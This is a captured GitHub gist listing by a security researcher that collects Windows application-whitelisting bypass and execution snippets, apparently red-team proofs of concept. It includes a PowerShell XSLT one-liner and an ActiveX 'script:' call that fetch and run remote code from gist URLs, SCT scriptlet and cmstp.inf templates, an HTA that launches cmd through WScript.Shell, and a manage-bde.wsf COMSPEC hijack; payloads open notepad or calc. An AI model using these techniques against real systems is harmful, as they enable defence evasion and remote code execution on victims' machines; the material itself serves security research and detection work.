bohops
/ PowerShell.txt
Last active
September 26, 2022 23:31
Snippets of PowerShell bypass/evasion/execution techniques that are interesting
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ############################################################################## | |
| ### Powershell Xml/Xsl Assembly "Fetch & Execute" | |
| ### [https://twitter.com/bohops/status/966172175555284992] | |
| $s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z; | |
| ############################################################################## | |
| ### Powershell VBScript Assembly SCT "Fetch & Execute" | |
| ### [https://twitter.com/bohops/status/965670898379476993] |
bohops
/ notepad.xml
Last active
September 26, 2022 23:30
notepad.xml for testing (++++ @subTee and @HarmJ0y)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0"?> | |
| <command> | |
| <a> | |
| <!-- Proof Of Concept - @subTee --> | |
| <!-- Proof Of Concept - @HarmJ0y --> | |
| <execute>iex notepad.exe</execute> | |
| </a> | |
| </command> |
bohops
/ notepad.sct
Last active
September 26, 2022 23:30
notepad.sct for testing (++++ @subTee and @redcanaryco)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Bandit" | |
| progid="Bandit" | |
| version="1.00" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| > |
bohops
/ xsl-notepad.xml
Last active
September 26, 2022 23:29
XSL Testing (++++++ netbiosX and subTee) - https://pentestlab.blog/2017/07/06/applocker-bypass-msxsl/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0"?> | |
| <?xml-stylesheet type="text/xsl" href="https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/6456162763d2bb427e71e41f84792867cb1b4c0f/xsl-notepad.xsl" ?> | |
| <customers> | |
| <customer> | |
| <name>Microsoft</name> | |
| </customer> | |
| </customers> |
bohops
/ test.inf
Last active
March 12, 2020 08:51
Test inf-sct execution (+++ @NickTyrer - https://gist.github.com/NickTyrer/)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ;cmstp.exe /s cmstp.inf | |
| [version] | |
| Signature=$chicago$ | |
| AdvancedINF=2.5 | |
| [DefaultInstall_SingleUser] | |
| UnRegisterOCXs=UnRegisterOCXSection | |
| [UnRegisterOCXSection] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Bandit" | |
| progid="Bandit" | |
| version="1.00" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| > |
bohops
/ activex.txt
Created
February 26, 2018 00:09
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| GetObject("script:https://gist.githubusercontent.com/bohops/72031fecb0f58531753f51d4ef2b86e9/raw/805dcca541e6b5efa1420e8758eaea9c3487dcf0/notepad.sct").Exec() |
bohops
/ Build_In_Memory_CSharp_Project.txt
Last active
September 26, 2022 08:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-) | |
| These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs. | |
| Basic gist after running PS script statements: | |
| - Loads C# project from file or web URL | |
| - Create various tmp files | |
| - Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"] | |
| - Comvert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html><head><script> | |
| a=new ActiveXObject("WScript.Shell"); | |
| a.run('%windir%\\System32\\cmd.exe /c calc.exe', 0);window.close(); | |
| </script></head></html> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| I came across an interesting Windows Script File (WSF) that has been around a while called 'manage-bde.wsf'. It may be located in SYSTEM32. | |
| Though not nearly as cool as SyncAppvPublishingServer[.com/.vbs], we can 'tamper' with manage-bde.wsf to run things in unattended ways. | |
| Here are a few examples that you may or may not find useful - | |
| 1) Replace ComSpec Variable | |
| set comspec=c:\windows\system32\calc.exe | |
| cscript manage-bde.wsf |
OlderNewer